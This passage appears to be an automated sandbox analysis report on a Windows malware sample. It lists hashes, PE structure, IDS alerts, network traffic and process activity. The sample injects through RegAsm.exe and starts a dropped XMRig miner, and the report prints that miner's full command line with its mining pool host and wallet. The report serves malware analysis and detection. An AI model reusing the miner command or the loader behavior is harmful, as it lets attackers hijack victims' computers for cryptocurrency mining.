                                                                                    • Filename: lO188m2RAu.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: 01904399.dat.exe, Detection: malicious, Browse
                                                                                    • Filename: Vsob3IooE7.exe, Detection: malicious, Browse
                                                                                    • Filename: ruZVRNvu0Y.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......^.........."...........k.....N2.........@.............................P........?... ..................................................0..P....@..../...W.......>..:...........................................................0...............................MPRESS1. ...............................MPRESS2.....0...........................rsrc...../..@..../.................@..............................................................v2.19..L...H...(.@.......H.......H.....`..f.@....H....O..H..(..0...&......*.....4%. 0.h. <...W..3.3.A...(.....1(.....0 ...0@.......`..N..Q.......w.....3.H...]K..X.ev.u. [.? L._.k\...........G..q\....Q..@. ......_0...+.........!.8..X0.W....t.".I.%. .. .............~.....~....S.~Cp.W:~..................O.A ...p\........L..`..O..........3.i.e...lA..A.....H...I;..|.....O=.p....-..........3..K/.. ~.@.Q0G.."...Q......)..(..".!......@..P.)...%O.H.1......X0......G.X.XP....^Q..5|^2.E

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.948526018433718
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:kWYLtJ0Cn1.exe
                                                                                    File size:4'819'968 bytes
                                                                                    MD5:917f9d9d484f8657efc7f60b8adde947
                                                                                    SHA1:01e4648cef9fb934429d63471127805120202ca9
                                                                                    SHA256:1099655a13691a6c4856fa29fa038e89805c8ff7ba6d04c6c56128728be19ff4
                                                                                    SHA512:6f81636f49ac851709372e04fa4b95a47da1d17bb84c0150fda6f1ee37111ac357ae17414e9d96f597ac99b2693a9b5838d43fc22b12abbed3e6bbf6421635d2
                                                                                    SSDEEP:98304:ybFXaexwoV2rqKxaWkidqVtIhjAgWlZHrtjFsN3RwC+cDhfXXWB:gwexwoVLhidqVtg8jZHrw3wC+8
                                                                                    TLSH:672623113AD18036D77324324A29E3B617AEF9310F5986EF17D85E7E2F34AC19B2161E
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xl...?...?...?W..>...?W..>...?W..>...?F..>...?W..>...?...?...?F..>...?F..>...?w..>...?w..?...?w..>...?Rich...?........PE..L..

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x42e1ba
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x669F79AF [Tue Jul 23 09:36:47 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:af0f88358390a4f58963b26bacea4505

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FEDC0D945A7h
                                                                                    jmp 00007FEDC0D93748h
                                                                                    mov ecx, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr fs:[00000000h], ecx
                                                                                    pop ecx
                                                                                    pop edi
                                                                                    pop edi
                                                                                    pop esi
                                                                                    pop ebx
                                                                                    mov esp, ebp
                                                                                    pop ebp
                                                                                    push ecx
                                                                                    ret
                                                                                    mov ecx, dword ptr [ebp-10h]
                                                                                    xor ecx, ebp
                                                                                    call 00007FEDC0D93153h
                                                                                    jmp 00007FEDC0D93902h
                                                                                    mov ecx, dword ptr [ebp-14h]
                                                                                    xor ecx, ebp
                                                                                    call 00007FEDC0D93144h
                                                                                    jmp 00007FEDC0D938F3h
                                                                                    push eax
                                                                                    push dword ptr fs:[00000000h]
                                                                                    lea eax, dword ptr [esp+0Ch]
                                                                                    sub esp, dword ptr [esp+0Ch]
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [eax], ebp
                                                                                    mov ebp, eax
                                                                                    mov eax, dword ptr [0049C100h]
                                                                                    xor eax, ebp
                                                                                    push eax
                                                                                    push dword ptr [ebp-04h]
                                                                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                    ret
                                                                                    push eax
                                                                                    push dword ptr fs:[00000000h]
                                                                                    lea eax, dword ptr [esp+0Ch]
                                                                                    sub esp, dword ptr [esp+0Ch]
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [eax], ebp
                                                                                    mov ebp, eax
                                                                                    mov eax, dword ptr [0049C100h]
                                                                                    xor eax, ebp
                                                                                    push eax
                                                                                    mov dword ptr [ebp-10h], eax
                                                                                    push dword ptr [ebp-04h]
                                                                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                    ret
                                                                                    push eax
                                                                                    push dword ptr fs:[00000000h]
                                                                                    lea eax, dword ptr [esp+0Ch]
                                                                                    sub esp, dword ptr [esp+0Ch]
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [eax], ebp
                                                                                    mov ebp, eax
                                                                                    mov eax, dword ptr [0049C100h]
                                                                                    xor eax, ebp
                                                                                    push eax
                                                                                    mov dword ptr [ebp-10h], esp

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9aa980x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4980000x1e0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4990000x50e4.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x931b00x54.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x932c00x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x930f00x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x890000x218.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x870f60x87200ea2552f81ceccf649a83b4b70470fd03False0.4206500057816836data6.662104007323327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x890000x127740x128008589e608da1f6a3153f2c50536c2bfbfFalse0.3732712204391892data4.729413980411144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x9c0000x3fb1f80x3f9a00d6b749cff934fb227069b52f0b853fbcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x4980000x1e00x200163e56f8d734ee3f87ce78c26893fd50False0.52734375data4.7059600829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x4990000x50e40x5200096ca5203311410b029f61ecbe9c0afaFalse0.7240377286585366data6.620919772930253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_MANIFEST0x4980600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                    Imports

                                                                                    DLLImport
                                                                                    USER32.dllOffsetRect
                                                                                    KERNEL32.dllGetCPInfo, CreateFileW, WaitForSingleObject, GetModuleHandleA, SwitchToFiber, CreateThread, GetProcAddress, VirtualAllocEx, RaiseException, RtlCaptureStackBackTrace, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, FormatMessageA, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, CloseHandle, WaitForSingleObjectEx, Sleep, SwitchToThread, GetExitCodeThread, GetNativeSystemInfo, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LocalFree, GetLocaleInfoEx, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, SetFileInformationByHandle, GetTempPathW, InitOnceExecuteOnce, CreateEventExW, CreateSemaphoreExW, FlushProcessWriteBuffers, GetCurrentProcessorNumber, GetSystemTimeAsFileTime, GetTickCount64, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForThreadpoolTimerCallbacks, CloseThreadpoolTimer, CreateThreadpoolWait, SetThreadpoolWait, CloseThreadpoolWait, GetModuleHandleW, GetFileInformationByHandleEx, CreateSymbolicLinkW, GetStringTypeW, CompareStringEx, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, HeapSize, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, SetConsoleCtrlHandler, HeapAlloc, HeapFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetCurrentThread, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, OutputDebugStringW, SetStdHandle

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                    2024-07-23T15:48:56.694363+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage497383333192.168.2.4141.94.96.71
                                                                                    2024-07-23T15:45:21.326757+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage497433333192.168.2.4141.94.96.144
                                                                                    2024-07-23T15:45:36.297076+0200UDP2047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)5174453192.168.2.41.1.1.1
                                                                                    2024-07-23T15:47:54.453933+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage497303333192.168.2.4141.94.96.195

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jul 23, 2024 15:45:36.325097084 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:36.329977989 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:36.330070019 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:36.330198050 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:36.334901094 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:36.987026930 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:37.045387030 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:37.222357035 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:37.342267990 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:45.067085028 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:45.232928991 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:47.387953997 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:47.462961912 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:45:57.467072964 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:45:57.545435905 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:07.578005075 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:07.639174938 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:17.541326046 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:17.732956886 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:27.560554981 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:27.639206886 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:31.275918007 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:31.342360973 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:41.139170885 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:41.342370987 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:45.095571041 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:45.236675024 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:51.391105890 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:51.431804895 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:57.055246115 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:46:57.060457945 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:57.267616034 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:46:57.345432043 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:01.664247036 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:01.729592085 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:12.097337008 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:12.233040094 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:13.212307930 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:13.212369919 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:13.213119984 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:13.213335991 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:22.399856091 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:22.520509958 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:32.376017094 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:32.436224937 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:42.450131893 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:42.545567036 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:45.141251087 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:45.257195950 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:52.686913967 CEST333349730141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:47:52.733061075 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:54.453933001 CEST497303333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:47:55.693361998 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:47:55.698901892 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:55.699022055 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:47:55.699141979 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:47:55.705888987 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:57.841623068 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:57.846234083 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:57.846296072 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:47:58.921458006 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:59.029944897 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:47:59.215148926 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:47:59.326819897 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:09.538964987 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:09.717470884 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:19.574168921 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:19.717475891 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:29.615369081 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:29.721797943 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:40.719981909 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:40.826919079 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:51.101943970 CEST333349738141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:51.217513084 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:56.694363117 CEST497383333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.562686920 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.629030943 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:57.629121065 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.629283905 CEST497393333192.168.2.4141.94.96.71
                                                                                    Jul 23, 2024 15:48:57.655706882 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:48:57.656150103 CEST333349739141.94.96.71192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.563280106 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.568479061 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.568635941 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.568758011 CEST497403333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:03.573585033 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:03.779553890 CEST333349740141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.629460096 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.634418964 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.634527922 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.634742022 CEST497413333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:09.639951944 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:09.847747087 CEST333349741141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.682728052 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.703551054 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.703618050 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.703718901 CEST497423333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:15.710645914 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:15.852020025 CEST333349742141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.741179943 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.754950047 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.755022049 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.755145073 CEST497433333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:21.766104937 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:21.815479040 CEST333349743141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:26.937556028 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.029578924 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:27.029915094 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.029915094 CEST497443333192.168.2.4141.94.96.195
                                                                                    Jul 23, 2024 15:49:27.053020000 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:27.483872890 CEST333349744141.94.96.195192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.000771999 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.156101942 CEST333349745141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.156335115 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.273247004 CEST497453333192.168.2.4141.94.96.144
                                                                                    Jul 23, 2024 15:49:33.298979044 CEST333349745141.94.96.144192.168.2.4
                                                                                    Jul 23, 2024 15:49:33.381174088 CEST333349745141.94.96.144192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jul 23, 2024 15:45:36.297075987 CEST5174453192.168.2.41.1.1.1
                                                                                    Jul 23, 2024 15:45:36.321499109 CEST53517441.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jul 23, 2024 15:45:36.297075987 CEST192.168.2.41.1.1.10xb7dfStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jul 23, 2024 15:45:36.321499109 CEST1.1.1.1192.168.2.40xb7dfNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jul 23, 2024 15:45:36.321499109 CEST1.1.1.1192.168.2.40xb7dfNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                                    Jul 23, 2024 15:45:36.321499109 CEST1.1.1.1192.168.2.40xb7dfNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                                    Jul 23, 2024 15:45:36.321499109 CEST1.1.1.1192.168.2.40xb7dfNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:09:45:24
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\Desktop\kWYLtJ0Cn1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\kWYLtJ0Cn1.exe"
                                                                                    Imagebase:0xf60000
                                                                                    File size:4'819'968 bytes
                                                                                    MD5 hash:917F9D9D484F8657EFC7F60B8ADDE947
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:09:45:27
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    Imagebase:0xa70000
                                                                                    File size:65'440 bytes
                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:09:45:33
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1743254277.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 61%, ReversingLabs
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:09:45:33
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:09:45:34
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                    Imagebase:0x7ff6eef20000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
